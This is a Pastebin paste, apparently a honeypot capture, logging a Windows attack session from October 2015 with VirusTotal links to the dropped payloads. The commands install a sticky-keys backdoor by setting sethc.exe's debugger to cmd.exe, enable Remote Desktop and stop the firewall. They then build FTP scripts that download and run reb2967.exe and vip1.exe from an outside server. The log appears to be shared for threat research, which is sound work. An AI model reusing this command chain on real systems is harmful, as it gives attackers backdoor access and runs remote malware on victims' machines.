API tools faq
paste
Advertisement
benkow_

log shell win

benkow_
Oct 16th, 2015
417
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.49 KB | None | 0 0
raw download clone embed print report
  1. 2015-10-16 23:33:19 - 42.96.140.141 incoming shellcommand:
  2. copy "%systemroot%\$NtServicePackUninstall$\ftp.exe" "%systemroot%\system32\ftp.exe"/y
  3. copy "%systemroot%\$NtServicePackUninstall$\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
  4. copy "%systemroot%\system32\dllcache\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
  5. copy "%systemroot%\system32\dllcache\ftp.exe" "%systemroot%\system32\ftp.exe"/y
  6. copy "%systemroot%\$NtServicePackUninstall$\net1.exe" "%systemroot%\system32\net1.exe"/y
  7. copy "%systemroot%\ServicePackFiles\i386\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
  8. copy "%systemroot%\ServicePackFiles\i386\ftp.exe" "%systemroot%\system32\ftp.exe"/y
  9. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /f
  10. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe" /f
  11. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net1.exe" /f
  12. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe" /f
  13. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /d "%systemroot%\system32\cmd.exe"
  14. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_DWORD /d "0" /f
  15. cacls %systemroot%\system32\ftp.exe /e /p system:f
  16. cacls %systemroot%\system32\net1.exe /e /p system:f
  17. cacls %systemroot%\system32\wscript.exe /e /p system:f
  18. net1 stop sharedaccess
  19. echo open 42.96.203.188>>assa2an.txt
  20. echo cesi>>assa2an.txt
  21. echo cesi>>assa2an.txt
  22. echo bin>>assa2an.txt
  23. echo get reb2967.exe>>assa2an.txt-
  24. echo bye>>assa2an.txt
  25. ftp -s:assa2an.txt
  26. reb2967.exe
  27. reb2967.exe
  28. del assa2an.txt
  29. echo open 42.96.203.188 >>sadsad.txt
  30. echo cesi>>sadsad.txt
  31. echo cesi>>sadsad.txt
  32. echo bin>>sadsad.txt
  33. echo get vip1.exe>>sadsad.txt
  34. echo bye>>sadsad.txt
  35. tvcv.exe -s:sadsad.txt
  36. vip1.exe
  37. vip1.exe
  38. del sadsad.txt
  39. cacls %systemroot%\system32\ftp.exe /e /p
  40. system:n
  41. cacls %systemroot%\system32\wscript.exe /e /p system:n
  42. exit
  43. exit
  44.  
  45.  
  46. ##########################################################################
  47. Payloads:
  48. vip1.exe - https://www.virustotal.com/fr/file/03f4dc0cace57cc3bfdccde268acfe88ba9713afe4edb915cd516fe0d43962c4/analysis/1444397185/
  49. reb2967.exe - https://www.virustotal.com/fr/file/fa1bdae4ca16f9c22842408a4f711a491a4e0cd11d0c64c8e4bd1b8e08eb8420/analysis/1444397180/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!